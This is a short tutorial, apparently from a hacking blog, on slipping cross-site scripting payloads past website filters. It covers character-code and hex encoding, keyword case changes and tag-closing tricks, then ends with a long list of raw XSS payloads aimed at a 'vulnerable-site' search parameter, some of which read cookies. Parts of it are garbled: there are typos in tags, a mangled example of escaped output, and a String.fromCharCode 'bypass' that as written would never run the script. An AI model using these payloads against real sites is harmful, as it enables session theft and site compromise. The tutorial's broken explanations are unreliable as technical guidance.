Bypassing the XSS Filters
Sometimes, website owner use XSS filters(WAF) to protect against XSS vulnerability.
For eg: if you put the <scirpt>alert("hi")</script> , the Filter will escape the "(quote) character , so the script will become.
<script>alert(>xss detected<)</script>
Now this script won't work. Likewise Filters use different type of filtering method to give protection against the XSS. In this case, we can use some tricks to bypass the filter. Here i am going to cover that only.
1.Bypassing magic_quotes_gpc
The magic_quotes_gpc=ON is a PHP setting(configured in PHP.ini File) , it escapes the every ' (single-quote), " (double quote) and \ with a backslash automatically.
For Eg:
<scirpt>alert("hi");</script> will be filtered as <script>alert(\hi\)</script>.so the script won't work now.
we can easily bypass this filter by using ASCII characters instead.
For Eg: alert("hi"); can be converted to
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)
so it just look like this <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>
In this case there is no "quotes or 'single quotes or / so the filter can't filter this thing. And, it will successfully run the script.
2.HEX Encoding
we can encode our whole script into HEX code so that it can't be filtered.
For example: <script>alert("Hi");</script> can be convert to HEX as:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Now put the code in the vulnerable site request.
For ex:
hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Converting to HEX:
This site will convert to hex code: http://centricle.com/tools/ascii-hex/
3.Bypassing using Obfuscation
Some website admin put the script,alert in restricted word list. so whenever you input this keywords, the filter will remove it and will give error message like "you are not allowed to search this". This can bypassed by changing the case of the keywords(namely Obfuscation).
For eg:
<ScRipt>ALeRt("hi");</sCRipT>
4. Closing Tag
Sometimes putting "> at the beginning of the code will work.
"><script>alert("Hi");</script>
This will end the previous opened tag and open our script tag.
Example:
hxxp://vulnerable-site/search?q="><script>alert("Ne0");</script>
Some more filter
'"--></style></script><script>alert("XSS")</script>
';alert(String.fromCharCode(88,83,83))//\'";alert(String.fromCharCode(88,83,83))//\"<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'%3Balert(String.fromCharCode(88,83,83))%3B/*
<script+language%3D'javascript'>alert(document.cookie)<%2Fscript>&type=all
<script+language%3D'javascript'>alert(document.cookie)<%2Fscript>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&page=search
">"><%2Fscript><script>alert(String.fromCharCode(88,83,83))%3B<%2Fscript>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>"<'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><iframe+onload%3Dalert(%2FXSS%2F)>
-%3E%3Cscript%3Ealert%28XSS%29%3C/script%3E.html
1;i=1;land=1;m=1;oq=<script>alert(%22Ne0%22)</script>
<script>alert(%22Neo%22)</script>
%3Cscript%3Ealert%28%22Neo%22%29%3C%2Fscript%3E
%3Cscript%3Ealert%28%22Neo%22%29%3C%2Fscript%3E
<script>alert(%22gee+wiz%22)</script>&oldqt=<script>alert(%22Deoffuscated%22)</script>
''"><img scr=/ onerror=alert(document.domain)></img>
%3Cscript%3Ealert%28%Neo%%29%3C%2Fscript%3E